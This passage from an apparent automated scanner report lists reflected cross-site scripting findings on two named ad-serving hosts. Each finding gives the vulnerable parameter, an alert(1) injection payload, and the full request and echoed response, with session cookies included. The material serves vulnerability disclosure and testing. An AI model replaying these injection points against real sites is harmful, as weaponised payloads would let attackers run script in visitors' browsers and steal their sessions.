HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:52 GMT
Server: Apache/2.2
Content-Length: 1116
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

1.210. http://mads.cbsnews.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into a JavaScript inline comment. The payload e911c*/alert(1)//dc43016cd59 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:46 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:37:46 GMT
Content-Length: 618

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL
...[SNIP]...

1.211. http://mads.cbsnews.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload dc004<a>c7e5ad6dad5 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:24 GMT
Content-Length: 552

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&
...[SNIP]...

1.212. http://mads.cbsnews.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 4e95f*/alert(1)//b34259e989e was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: Apache/2.2
Content-Length: 1088
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:54 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

1.213. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 4d5b0*/alert(1)//4aaf1da79cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:12 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:12 GMT
Content-Length: 610

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101
...[SNIP]...

1.214. http://mads.cbsnews.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 7ae8b*/alert(1)//a2655b7e480 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:05 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews
...[SNIP]...

1.215. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd83b"><script>alert(1)</script>a6532cd236c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframefd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addynfd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.216. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7704"><script>alert(1)</script>52919f7acc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.217. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b13"><script>alert(1)</script>96e07070135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.218. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228ac"><script>alert(1)</script>727f9da3634 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.219. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9f27"><script>alert(1)</script>1f3976d245b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.220. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efe9"><script>alert(1)</script>c6708a262a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.221. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6054d"><script>alert(1)</script>db683bfce34 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.222. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3425e"><script>alert(1)</script>0d0a6d3f675 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675;adiframe=y">
...[SNIP]...

1.223. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047e"><script>alert(1)</script>84b7f80ebaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

